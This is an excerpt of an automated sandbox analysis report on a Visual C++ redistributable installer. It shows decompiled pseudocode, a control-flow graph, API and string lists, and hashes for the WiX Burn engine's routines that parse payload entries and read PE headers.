                                                                          0x0001baf4
                                                                          0x0001bb06
                                                                          0x0001bb06

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 0001B3FF
                                                                          • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B44C
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 0001B452
                                                                          • ReadFile.KERNELBASE(00000000,0001435C,00000040,?,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B49A
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 0001B4A0
                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B4FD
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B503
                                                                          • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B54C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B552
                                                                          • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B5C3
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B5C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$Pointer$Read
                                                                          • String ID: ($.wix$4$@Met$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                          • API String ID: 2600052162-807742151
                                                                          • Opcode ID: b4685404a93aef9ca5662f3ca8ab24c0a884becce16d6f2b1946e0ab6efaabd5
                                                                          • Instruction ID: e8b0278f7de57455254e731c4de73bae9a5145eaec978a3245cc921182038642
                                                                          • Opcode Fuzzy Hash: b4685404a93aef9ca5662f3ca8ab24c0a884becce16d6f2b1946e0ab6efaabd5
                                                                          • Instruction Fuzzy Hash: C312C271A40325ABEB349A65CC86FFB76E8EF04701F004165FE09EB181DB749E85CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001CCB6 Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 366COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 545 1ccb6-1cce2 call 53803 548 1cce4 545->548 549 1ccf6-1cd07 545->549 550 1cce9-1ccf1 call 5012f 548->550 554 1cd10-1cd15 549->554 555 1cd09-1cd0e 549->555 556 1d04b-1d050 550->556 554->556 557 1cd1b-1cd2e call 138d4 554->557 555->550 558 1d052-1d054 556->558 559 1d058-1d05d 556->559 564 1cd30-1cd4f call 137d3 call 5012f 557->564 565 1cd54-1cd61 557->565 558->559 561 1d065-1d069 559->561 562 1d05f-1d061 559->562 566 1d073-1d079 561->566 567 1d06b-1d06e call 554ef 561->567 562->561 577 1d04a 564->577 570 1d047 565->570 571 1cd67-1cd69 565->571 567->566 574 1d049 570->574 573 1cd6c-1cd82 call 53760 571->573 580 1d121 573->580 581 1cd88-1cd9a call 531c7 573->581 574->577 577->556 582 1d126-1d12e call 5012f 580->582 587 1cda0-1cdb5 call 531c7 581->587 588 1d11a-1d11f 581->588 582->574 591 1d113-1d118 587->591 592 1cdbb-1cdd0 call 531c7 587->592 588->582 591->582 595 1cdd6-1cdf1 CompareStringW 592->595 596 1d10c-1d111 592->596 597 1cdf3-1cdfa 595->597 598 1cdfc-1ce11 CompareStringW 595->598 596->582 599 1ce3a-1ce3e 597->599 600 1ce13-1ce16 598->600 601 1ce18-1ce2d CompareStringW 598->601 604 1ce40-1ce4c call 531c7 599->604 605 1ce82-1ce9b call 533db 599->605 600->599 602 1d0f1-1d0f9 601->602 603 1ce33 601->603 607 1d0fe-1d107 call 5012f 602->607 603->599 611 1ce51-1ce59 604->611 612 1cea5-1cebe call 531c7 605->612 613 1ce9d-1ce9f 605->613 607->574 615 1ce61-1ce63 611->615 616 1ce5b-1ce5f 611->616 624 1cec0-1cec4 612->624 625 1cec6-1cec8 612->625 613->612 617 1d090-1d095 613->617 619 1d086-1d08b 615->619 620 1ce69-1ce7c call 1c0a9 615->620 616->605 616->615 617->582 619->582 620->605 626 1d07c-1d084 620->626 624->625 627 1cece-1cee7 call 531c7 624->627 625->627 628 1d0ea-1d0ef 625->628 626->607 631 1cee9-1ceed 627->631 632 1ceef-1cef1 627->632 628->582 631->632 634 1cef7-1cf10 call 531c7 631->634 633 1d0e3-1d0e8 632->633 632->634 633->582 637 1cf32-1cf4b call 531c7 634->637 638 1cf12-1cf14 634->638 645 1cf4d-1cf4f 637->645 646 1cf6f-1cf88 call 531c7 637->646 639 1d0a4-1d0a9 638->639 640 1cf1a-1cf2c call 12a22 638->640 639->582 640->637 647 1d09a-1d09f 640->647 648 1d0b2-1d0b7 645->648 649 1cf55-1cf69 call 1200b 645->649 653 1cf8a-1cf8c 646->653 654 1cfac-1cfc1 call 531c7 646->654 647->582 648->582 649->646 659 1d0ab-1d0b0 649->659 656 1d0c0-1d0c5 653->656 657 1cf92-1cfa6 call 1200b 653->657 663 1cfc7-1cfdb call 1200b 654->663 664 1d0dc-1d0e1 654->664 656->582 657->654 665 1d0b9-1d0be 657->665 659->582 668 1cfe1-1cffa call 531c7 663->668 669 1d0d5-1d0da 663->669 664->582 665->582 672 1d01d-1d022 668->672 673 1cffc-1cffe 668->673 669->582 674 1d024-1d02a 672->674 675 1d02e-1d041 672->675 676 1d004-1d017 call 1c780 673->676 677 1d0ce-1d0d3 673->677 674->675 675->570 675->573 676->672 681 1d0c7-1d0cc 676->681 677->582 681->582
                                                                          C-Code - Quality: 71%
                                                                          			E0001CCB6(void* __ebx, void* __edi, signed int* _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _t92;
				signed int _t94;
				signed int _t102;
				signed int _t103;
				int _t112;
				int _t113;
				int _t114;
				signed int _t136;
				signed int _t150;
				signed int* _t157;
				signed int _t160;
				signed int _t161;
				signed int* _t162;
				signed int _t165;
				void* _t175;
				signed int _t176;

				_v20 = _v20 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t176 = E00053803(_a16, L"Payload",  &_v20);
				if(_t176 >= 0) {
					_t92 = _v20;
					_t176 =  *((intOrPtr*)( *_t92 + 0x20))(_t92,  &_v16);
					__eflags = _t176;
					if(_t176 >= 0) {
						_t94 = _v16;
						__eflags = _t94;
						if(_t94 != 0) {
							_t102 = E000138D4(_t94 * 0x58, 1);
							_t157 = _a4;
							 *_t157 = _t102;
							__eflags = _t102;
							if(_t102 != 0) {
								_t103 = _v16;
								_a16 = _a16 & 0x00000000;
								_t157[1] = _t103;
								__eflags = _t103;
								if(_t103 == 0) {
									L50:
									_t176 = 0;
									__eflags = 0;
								} else {
									_t162 = 0;
									__eflags = 0;
									_a4 = 0;
									while(1) {
										_t175 = _t162 +  *_t157;
										_t176 = E00053760(_t162, _v20,  &_v12, 0);
										__eflags = _t176;
										if(_t176 < 0) {
											break;
										}
										_t176 = E000531C7(_v12, L"Id", _t175);
										__eflags = _t176;
										if(_t176 < 0) {
											_push("Failed to get @Id.");
											goto L81;
										} else {
											_t24 = _t175 + 0x18; // 0x15355
											_t176 = E000531C7(_v12, L"FilePath", _t24);
											__eflags = _t176;
											if(_t176 < 0) {
												_push("Failed to get @FilePath.");
												goto L81;
											} else {
												_t176 = E000531C7(_v12, L"Packaging",  &_v8);
												__eflags = _t176;
												if(_t176 < 0) {
													_push("Failed to get @Packaging.");
													goto L81;
												} else {
													_t112 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"download", 0xffffffff);
													__eflags = _t112 - 2;
													if(_t112 != 2) {
														_t113 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"embedded", 0xffffffff);
														__eflags = _t113 - 2;
														if(_t113 != 2) {
															_t114 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"external", 0xffffffff);
															__eflags = _t114 - 2;
															if(_t114 != 2) {
																_push(_v8);
																_t176 = 0x80070057;
																_push("Invalid value for @Packaging: %ls");
																goto L76;
															} else {
																 *(_t175 + 4) = 3;
																goto L20;
															}
														} else {
															 *(_t175 + 4) = _t113;
															goto L20;
														}
													} else {
														 *(_t175 + 4) = 1;
														L20:
														__eflags = _a8;
														if(_a8 == 0) {
															L25:
															_t41 = _t175 + 8; // 0x15345
															_t176 = E000533DB(_t162, _v12, L"LayoutOnly", _t41);
															__eflags = _t176 - 0x80070490;
															if(_t176 == 0x80070490) {
																L27:
																_t43 = _t175 + 0x38; // 0x15375
																_t176 = E000531C7(_v12, L"SourcePath", _t43);
																__eflags = _t176 - 0x80070490;
																if(_t176 != 0x80070490) {
																	L29:
																	__eflags = _t176;
																	if(_t176 < 0) {
																		_push("Failed to get @SourcePath.");
																		goto L81;
																	} else {
																		goto L30;
																	}
																} else {
																	__eflags =  *(_t175 + 4) - 1;
																	if( *(_t175 + 4) == 1) {
																		L30:
																		_t46 = _t175 + 0x40; // 0x1537d
																		_t176 = E000531C7(_v12, L"DownloadUrl", _t46);
																		__eflags = _t176 - 0x80070490;
																		if(_t176 != 0x80070490) {
																			L32:
																			__eflags = _t176;
																			if(_t176 < 0) {
																				_push("Failed to get @DownloadUrl.");
																				goto L81;
																			} else {
																				goto L33;
																			}
																		} else {
																			__eflags =  *(_t175 + 4) - 1;
																			if( *(_t175 + 4) != 1) {
																				L33:
																				_t176 = E000531C7(_v12, L"FileSize",  &_v8);
																				__eflags = _t176 - 0x80070490;
																				if(_t176 == 0x80070490) {
																					L36:
																					_t176 = E000531C7(_v12, L"CertificateRootPublicKeyIdentifier",  &_v8);
																					__eflags = _t176 - 0x80070490;
																					if(_t176 == 0x80070490) {
																						L39:
																						_t176 = E000531C7(_v12, L"CertificateRootThumbprint",  &_v8);
																						__eflags = _t176 - 0x80070490;
																						if(_t176 == 0x80070490) {
																							L42:
																							_t176 = E000531C7(_v12, L"Hash",  &_v8);
																							__eflags = _t176;
																							if(__eflags < 0) {
																								_push("Failed to get @Hash.");
																								goto L81;
																							} else {
																								_t65 = _t175 + 0x34; // 0x15371
																								_t66 = _t175 + 0x30; // 0x1536d
																								_t176 = E0001200B(_t162, __eflags, _v8, _t66, _t65);
																								__eflags = _t176;
																								if(_t176 < 0) {
																									_push("Failed to hex decode the Payload/@Hash.");
																									goto L81;
																								} else {
																									_t176 = E000531C7(_v12, L"Catalog",  &_v8);
																									__eflags = _t176 - 0x80070490;
																									if(_t176 == 0x80070490) {
																										L47:
																										_t165 = _v12;
																										__eflags = _t165;
																										if(_t165 != 0) {
																											 *((intOrPtr*)( *_t165 + 8))(_t165);
																											_t75 =  &_v12;
																											 *_t75 = _v12 & 0x00000000;
																											__eflags =  *_t75;
																										}
																										_t136 = _a16 + 1;
																										_t162 =  &(_a4[0x16]);
																										_a16 = _t136;
																										_a4 = _t162;
																										__eflags = _t136 - _v16;
																										if(_t136 < _v16) {
																											continue;
																										} else {
																											goto L50;
																										}
																									} else {
																										__eflags = _t176;
																										if(_t176 < 0) {
																											_push("Failed to get @Catalog.");
																											goto L81;
																										} else {
																											_t70 = _t175 + 0x1c; // 0x15359
																											_t176 = E0001C780(_t162, _a12, _v8, _t70);
																											__eflags = _t176;
																											if(_t176 < 0) {
																												_push("Failed to find catalog.");
																												goto L81;
																											} else {
																												goto L47;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							__eflags = _t176;
																							if(__eflags < 0) {
																								_push("Failed to get @CertificateRootThumbprint.");
																								goto L81;
																							} else {
																								_t60 = _t175 + 0x2c; // 0x15369
																								_t61 = _t175 + 0x28; // 0x15365
																								_t176 = E0001200B(_t162, __eflags, _v8, _t61, _t60);
																								__eflags = _t176;
																								if(_t176 < 0) {
																									_push("Failed to hex decode @CertificateRootThumbprint.");
																									goto L81;
																								} else {
																									goto L42;
																								}
																							}
																						}
																					} else {
																						__eflags = _t176;
																						if(__eflags < 0) {
																							_push("Failed to get @CertificateRootPublicKeyIdentifier.");
																							goto L81;
																						} else {
																							_t55 = _t175 + 0x24; // 0x15361
																							_t56 = _t175 + 0x20; // 0x1535d
																							_t176 = E0001200B(_t162, __eflags, _v8, _t56, _t55);
																							__eflags = _t176;
																							if(_t176 < 0) {
																								_push("Failed to hex decode @CertificateRootPublicKeyIdentifier.");
																								goto L81;
																							} else {
																								goto L39;
																							}
																						}
																					}
																				} else {
																					__eflags = _t176;
																					if(_t176 < 0) {
																						_push("Failed to get @FileSize.");
																						goto L81;
																					} else {
																						_t51 = _t175 + 0x10; // 0x1534d
																						_t176 = E00012A22(_v8, 0, _t51);
																						__eflags = _t176;
																						if(_t176 < 0) {
																							_push("Failed to parse @FileSize.");
																							goto L81;
																						} else {
																							goto L36;
																						}
																					}
																				}
																			} else {
																				goto L32;
																			}
																		}
																	} else {
																		goto L29;
																	}
																}
															} else {
																__eflags = _t176;
																if(_t176 < 0) {
																	_push("Failed to get @LayoutOnly.");
																	goto L81;
																} else {
																	goto L27;
																}
															}
														} else {
															_t150 = E000531C7(_v12, L"Container",  &_v8); // executed
															_t176 = _t150;
															__eflags = _t176 - 0x80070490;
															if(_t176 != 0x80070490) {
																L23:
																__eflags = _t176;
																if(_t176 < 0) {
																	_push("Failed to get @Container.");
																	L81:
																	_push(_t176);
																	E0005012F();
																} else {
																	_t38 = _t175 + 0x3c; // 0x15379
																	_t176 = E0001C0A9(_t162, _a8, _v8, _t38);
																	__eflags = _t176;
																	if(_t176 < 0) {
																		_push(_v8);
																		_push("Failed to to find container: %ls");
																		L76:
																		_push(_t176);
																		E0005012F();
																	} else {
																		goto L25;
																	}
																}
															} else {
																__eflags =  *(_t175 + 4) - 2;
																if( *(_t175 + 4) != 2) {
																	goto L25;
																} else {
																	goto L23;
																}
															}
														}
													}
												}
											}
										}
										goto L51;
									}
									_push("Failed to get next node.");
									goto L81;
								}
								L51:
							} else {
								_t176 = 0x8007000e;
								E000137D3(_t102, "payload.cpp", 0x2e, 0x8007000e);
								_push("Failed to allocate memory for payload structs.");
								_push(0x8007000e);
								E0005012F();
							}
						}
					} else {
						_push("Failed to get payload node count.");
						goto L2;
					}
				} else {
					_push("Failed to select payload nodes.");
					L2:
					_push(_t176);
					E0005012F();
				}
				_t160 = _v20;
				if(_t160 != 0) {
					 *((intOrPtr*)( *_t160 + 8))(_t160);
				}
				_t161 = _v12;
				if(_t161 != 0) {
					 *((intOrPtr*)( *_t161 + 8))(_t161);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t176;
			}























                                                                          0x0001ccbc
                                                                          0x0001ccc3
                                                                          0x0001ccc7
                                                                          0x0001cccb
                                                                          0x0001ccde
                                                                          0x0001cce2
                                                                          0x0001ccf6
                                                                          0x0001cd03
                                                                          0x0001cd05
                                                                          0x0001cd07
                                                                          0x0001cd10
                                                                          0x0001cd13
                                                                          0x0001cd15
                                                                          0x0001cd22
                                                                          0x0001cd27
                                                                          0x0001cd2a
                                                                          0x0001cd2c
                                                                          0x0001cd2e
                                                                          0x0001cd54
                                                                          0x0001cd57
                                                                          0x0001cd5b
                                                                          0x0001cd5f
                                                                          0x0001cd61
                                                                          0x0001d047
                                                                          0x0001d047
                                                                          0x0001d047
                                                                          0x0001cd67
                                                                          0x0001cd67
                                                                          0x0001cd67
                                                                          0x0001cd69
                                                                          0x0001cd6c
                                                                          0x0001cd77
                                                                          0x0001cd7e
                                                                          0x0001cd80
                                                                          0x0001cd82
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cd96
                                                                          0x0001cd98
                                                                          0x0001cd9a
                                                                          0x0001d11a
                                                                          0x00000000
                                                                          0x0001cda0
                                                                          0x0001cda0
                                                                          0x0001cdb1
                                                                          0x0001cdb3
                                                                          0x0001cdb5
                                                                          0x0001d113
                                                                          0x00000000
                                                                          0x0001cdbb
                                                                          0x0001cdcc
                                                                          0x0001cdce
                                                                          0x0001cdd0
                                                                          0x0001d10c
                                                                          0x00000000
                                                                          0x0001cdd6
                                                                          0x0001cdec
                                                                          0x0001cdee
                                                                          0x0001cdf1
                                                                          0x0001ce0c
                                                                          0x0001ce0e
                                                                          0x0001ce11
                                                                          0x0001ce28
                                                                          0x0001ce2a
                                                                          0x0001ce2d
                                                                          0x0001d0f1
                                                                          0x0001d0f4
                                                                          0x0001d0f9
                                                                          0x00000000
                                                                          0x0001ce33
                                                                          0x0001ce33
                                                                          0x00000000
                                                                          0x0001ce33
                                                                          0x0001ce13
                                                                          0x0001ce13
                                                                          0x00000000
                                                                          0x0001ce13
                                                                          0x0001cdf3
                                                                          0x0001cdf3
                                                                          0x0001ce3a
                                                                          0x0001ce3a
                                                                          0x0001ce3e
                                                                          0x0001ce82
                                                                          0x0001ce82
                                                                          0x0001ce93
                                                                          0x0001ce95
                                                                          0x0001ce9b
                                                                          0x0001cea5
                                                                          0x0001cea5
                                                                          0x0001ceb6
                                                                          0x0001ceb8
                                                                          0x0001cebe
                                                                          0x0001cec6
                                                                          0x0001cec6
                                                                          0x0001cec8
                                                                          0x0001d0ea
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cec0
                                                                          0x0001cec0
                                                                          0x0001cec4
                                                                          0x0001cece
                                                                          0x0001cece
                                                                          0x0001cedf
                                                                          0x0001cee1
                                                                          0x0001cee7
                                                                          0x0001ceef
                                                                          0x0001ceef
                                                                          0x0001cef1
                                                                          0x0001d0e3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cee9
                                                                          0x0001cee9
                                                                          0x0001ceed
                                                                          0x0001cef7
                                                                          0x0001cf08
                                                                          0x0001cf0a
                                                                          0x0001cf10
                                                                          0x0001cf32
                                                                          0x0001cf43
                                                                          0x0001cf45
                                                                          0x0001cf4b
                                                                          0x0001cf6f
                                                                          0x0001cf80
                                                                          0x0001cf82
                                                                          0x0001cf88
                                                                          0x0001cfac
                                                                          0x0001cfbd
                                                                          0x0001cfbf
                                                                          0x0001cfc1
                                                                          0x0001d0dc
                                                                          0x00000000
                                                                          0x0001cfc7
                                                                          0x0001cfc7
                                                                          0x0001cfcb
                                                                          0x0001cfd7
                                                                          0x0001cfd9
                                                                          0x0001cfdb
                                                                          0x0001d0d5
                                                                          0x00000000
                                                                          0x0001cfe1
                                                                          0x0001cff2
                                                                          0x0001cff4
                                                                          0x0001cffa
                                                                          0x0001d01d
                                                                          0x0001d01d
                                                                          0x0001d020
                                                                          0x0001d022
                                                                          0x0001d027
                                                                          0x0001d02a
                                                                          0x0001d02a
                                                                          0x0001d02a
                                                                          0x0001d02a
                                                                          0x0001d034
                                                                          0x0001d035
                                                                          0x0001d038
                                                                          0x0001d03b
                                                                          0x0001d03e
                                                                          0x0001d041
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cffc
                                                                          0x0001cffc
                                                                          0x0001cffe
                                                                          0x0001d0ce
                                                                          0x00000000
                                                                          0x0001d004
                                                                          0x0001d004
                                                                          0x0001d013
                                                                          0x0001d015
                                                                          0x0001d017
                                                                          0x0001d0c7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001d017
                                                                          0x0001cffe
                                                                          0x0001cffa
                                                                          0x0001cfdb
                                                                          0x0001cf8a
                                                                          0x0001cf8a
                                                                          0x0001cf8c
                                                                          0x0001d0c0
                                                                          0x00000000
                                                                          0x0001cf92
                                                                          0x0001cf92
                                                                          0x0001cf96
                                                                          0x0001cfa2
                                                                          0x0001cfa4
                                                                          0x0001cfa6
                                                                          0x0001d0b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cfa6
                                                                          0x0001cf8c
                                                                          0x0001cf4d
                                                                          0x0001cf4d
                                                                          0x0001cf4f
                                                                          0x0001d0b2
                                                                          0x00000000
                                                                          0x0001cf55
                                                                          0x0001cf55
                                                                          0x0001cf59
                                                                          0x0001cf65
                                                                          0x0001cf67
                                                                          0x0001cf69
                                                                          0x0001d0ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cf69
                                                                          0x0001cf4f
                                                                          0x0001cf12
                                                                          0x0001cf12
                                                                          0x0001cf14
                                                                          0x0001d0a4
                                                                          0x00000000
                                                                          0x0001cf1a
                                                                          0x0001cf1a
                                                                          0x0001cf28
                                                                          0x0001cf2a
                                                                          0x0001cf2c
                                                                          0x0001d09a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cf2c
                                                                          0x0001cf14
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ceed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cec4
                                                                          0x0001ce9d
                                                                          0x0001ce9d
                                                                          0x0001ce9f
                                                                          0x0001d090
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ce9f
                                                                          0x0001ce40
                                                                          0x0001ce4c
                                                                          0x0001ce51
                                                                          0x0001ce53
                                                                          0x0001ce59
                                                                          0x0001ce61
                                                                          0x0001ce61
                                                                          0x0001ce63
                                                                          0x0001d086
                                                                          0x0001d126
                                                                          0x0001d126
                                                                          0x0001d127
                                                                          0x0001ce69
                                                                          0x0001ce69
                                                                          0x0001ce78
                                                                          0x0001ce7a
                                                                          0x0001ce7c
                                                                          0x0001d07c
                                                                          0x0001d07f
                                                                          0x0001d0fe
                                                                          0x0001d0fe
                                                                          0x0001d0ff
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ce7c
                                                                          0x0001ce5b
                                                                          0x0001ce5b
                                                                          0x0001ce5f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ce5f
                                                                          0x0001ce59
                                                                          0x0001ce3e
                                                                          0x0001cdf1
                                                                          0x0001cdd0
                                                                          0x0001cdb5
                                                                          0x00000000
                                                                          0x0001cd9a
                                                                          0x0001d121
                                                                          0x00000000
                                                                          0x0001d121
                                                                          0x0001d049
                                                                          0x0001cd30
                                                                          0x0001cd30
                                                                          0x0001cd3d
                                                                          0x0001cd42
                                                                          0x0001cd47
                                                                          0x0001cd48
                                                                          0x0001cd4e
                                                                          0x0001d04a
                                                                          0x0001cd09
                                                                          0x0001cd09
                                                                          0x00000000
                                                                          0x0001cd09
                                                                          0x0001cce4
                                                                          0x0001cce4
                                                                          0x0001cce9
                                                                          0x0001cce9
                                                                          0x0001ccea
                                                                          0x0001ccf0
                                                                          0x0001d04b
                                                                          0x0001d050
                                                                          0x0001d055
                                                                          0x0001d055
                                                                          0x0001d058
                                                                          0x0001d05d
                                                                          0x0001d062
                                                                          0x0001d062
                                                                          0x0001d069
                                                                          0x0001d06e
                                                                          0x0001d06e
                                                                          0x0001d079

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,00015355,00000000,0005CA64,0001533D,00000000), ref: 0001CDEC
                                                                          Strings
                                                                          • Invalid value for @Packaging: %ls, xrefs: 0001D0F9
                                                                          • Failed to get @CertificateRootThumbprint., xrefs: 0001D0C0
                                                                          • Failed to find catalog., xrefs: 0001D0C7
                                                                          • Payload, xrefs: 0001CCD1
                                                                          • Failed to get @Container., xrefs: 0001D086
                                                                          • Failed to allocate memory for payload structs., xrefs: 0001CD42
                                                                          • download, xrefs: 0001CDDE
                                                                          • Failed to get @DownloadUrl., xrefs: 0001D0E3
                                                                          • Failed to hex decode the Payload/@Hash., xrefs: 0001D0D5
                                                                          • Failed to hex decode @CertificateRootThumbprint., xrefs: 0001D0B9
                                                                          • CertificateRootPublicKeyIdentifier, xrefs: 0001CF36
                                                                          • Packaging, xrefs: 0001CDBF
                                                                          • FileSize, xrefs: 0001CEFB
                                                                          • Failed to get @FilePath., xrefs: 0001D113
                                                                          • Container, xrefs: 0001CE44
                                                                          • DownloadUrl, xrefs: 0001CED2
                                                                          • FilePath, xrefs: 0001CDA4
                                                                          • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0001D0AB
                                                                          • CertificateRootThumbprint, xrefs: 0001CF73
                                                                          • Failed to select payload nodes., xrefs: 0001CCE4
                                                                          • Failed to get next node., xrefs: 0001D121
                                                                          • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0001D0B2
                                                                          • Failed to get @LayoutOnly., xrefs: 0001D090
                                                                          • SourcePath, xrefs: 0001CEA9
                                                                          • Catalog, xrefs: 0001CFE5
                                                                          • Failed to parse @FileSize., xrefs: 0001D09A
                                                                          • LayoutOnly, xrefs: 0001CE86
                                                                          • Hash, xrefs: 0001CFB0
                                                                          • Failed to get @SourcePath., xrefs: 0001D0EA
                                                                          • external, xrefs: 0001CE1A
                                                                          • Failed to get payload node count., xrefs: 0001CD09
                                                                          • Failed to get @Packaging., xrefs: 0001D10C
                                                                          • embedded, xrefs: 0001CDFE
                                                                          • Failed to to find container: %ls, xrefs: 0001D07F
                                                                          • Failed to get @Hash., xrefs: 0001D0DC
                                                                          • Failed to get @Id., xrefs: 0001D11A
                                                                          • Failed to get @FileSize., xrefs: 0001D0A4
                                                                          • Failed to get @Catalog., xrefs: 0001D0CE
                                                                          • payload.cpp, xrefs: 0001CD38
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateCompareProcessString
                                                                          • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                          • API String ID: 1171520630-3127305756
                                                                          • Opcode ID: b619964a9a0782ecc4c274e097a5991f07018c7b7d07996253a56f34af3b280b
                                                                          • Instruction ID: 10df2bba6ea5f061e053a6e5e0dad8204166730e038a5005a2bfb03ccf904f2b
                                                                          • Opcode Fuzzy Hash: b619964a9a0782ecc4c274e097a5991f07018c7b7d07996253a56f34af3b280b
                                                                          • Instruction Fuzzy Hash: E8C1C571D4162AFBDB219A50CC41FEF7BA4AB08751F100266FE00BB191C775EE85D791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

